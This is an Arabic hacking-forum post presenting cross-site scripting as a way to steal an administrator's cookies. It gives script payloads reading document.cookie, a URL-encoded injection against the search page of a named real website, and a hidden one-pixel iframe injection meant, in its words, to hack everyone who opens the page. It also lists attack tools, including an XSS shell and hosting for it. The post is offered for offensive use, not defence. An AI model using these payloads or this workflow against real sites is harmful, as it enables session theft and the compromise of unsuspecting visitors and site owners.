تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها


النتائج 1 إلى 10 من 12

الموضوع: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

مشاهدة المواضيع

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    aljyyosh تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    تعريفها
    و هى ثغرة من خلالها يمكنك سحب الكوكيز الخاص بالادمن
    ثغرة [ XSS ] هي اختصار لـ[ Cross site scripting ] وسبب عدم كتابتها بالاختصار الصحيح [ CSS ] لكي لا يحدث خلط مع لغة الـ[ CSS ] الانماط القياسية المعروفة [ Cascading Style Sheets ] , وبذلك تم تسميتها [ XSS ]
    ثغرات [ XSS ] لها نوعين وهما
    1 ثغرات XSS ثابته - مخزّنه [ Persistent - stored ]
    2 ثغرات XSS غير ثابته - غير مخزّنه [ Non persistent - Reflecte

    ثغرات XSS الثابته هي اخطر من النوع الغير ثابت , وذلك لان ثغرات XSS الثابته , مايدخله الزائر ثابت بالصفحه , اي مايدخله مثلاً يخزّن بقاعدة بيانات السكربت
    ثغرات الغير ثابته , هي النوع الاكثر انتشاراً وليس خطورة وهي التي تقوم على اساس الادخال الخاص مثلاً , كما ذكرنا سابقاً عند البحث في المنتديات هنا الحالة تسمى غير ثابته

    الكود المهم في ثغرات xss
    كود:
    **********alert(**************)</script>**********alert("XSS")</script>
    هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
    هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
    يحتوي على اليوزر نايم و الباسوورد المشفرmd5
    مثلا ناخذ هذا الموقع
    كود HTML:
    https://www.calacademy.org
    وريح يكون استغلال مثلا بشكل هذا
    كود HTML:
     https://www.calacademy.org/search.php?q=
    الكود هذا نحطو في اخير بعد العلامة (=)
    نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب
    كود:
    **********alert(document.cookie)</script>**********alert("XSS")</script>
    المهم يصبح هيك
    كود HTML:
    https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
    هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن اكواد برمجية ) , لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من التعامل مع هذه الثغرات باحترافية اكثر .
    1 – تلغيم الصفحة .
    وهنا سيتم حقن اكواد HTML لاضافة صفحة خفية ملغومة في داخل الموقع ( الصفحة ) المصاب
    كود:
    <html>
     <iframe name=”I1″ src=”https://www.calacademy.org/server.html” marginwidth=”1″ marginheight=”1″ height=”1″ width=”1″ scrolling=”no” border=”0″ frameborder=”0″>
     </iframe>
     </iframe></p>
     </html>
    عندها سيتم فتح هذا الموقع بطريقة خفية , وسيتم اختراق كل من دخل للصفحة التي تم حقن الكود فيها .
    الادوات :
    شل g.h.t.xssshell
    استضافة تدعم asp
    برنامج ftp FileZilla_3.7.3_win32-setup.exe Show file details (recommended)
    موقع للتلغيم (كل شغص يختار اي موقع للتلغيم )
    برنامج الختراق
    وهذا الفيديو يشرح لكم طريقة استغلال الثغرة
    وفي الاخير اتمنى ان اكون قد اوصلت لكم المعلومات الكافية
    وارجو من الله تعالى ان يوفقني ويوفقكم فيما يحبه ويرضاه والسلام عليكم
    لاتنسونا بتققيم الموضوع

    - - - تم التحديث - - -
    التعديل الأخير تم بواسطة aymandz ; 01-24-2014 الساعة 08:26 PM

    (لن اطلب الرحمة من احد لانه سوف ياتي اليوم الذي لن ارحم فيه احد )

المواضيع المتشابهه

  1. استفسار بسيط للخبراء في مجال الحماية وبرامجها
    بواسطة HaCkeR Gold في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 10
    آخر مشاركة: 11-08-2012, 02:29 AM
  2. استفسار بسيط للخبراء في مجال الحماية وبرامجها
    بواسطة HaCkeR Gold في المنتدى منتدى حماية الأجهزة
    مشاركات: 3
    آخر مشاركة: 11-05-2012, 01:02 AM
  3. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  4. ممكن كم برنامج يتعلق بالتشفير...
    بواسطة ذكريات هكر في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 6
    آخر مشاركة: 11-25-2011, 07:03 PM
  5. شرح كامل 100% وكل ما يتعلق بال ( Dos ) الدوس
    بواسطة غروك وغيروك في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 3
    آخر مشاركة: 09-24-2011, 11:09 PM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •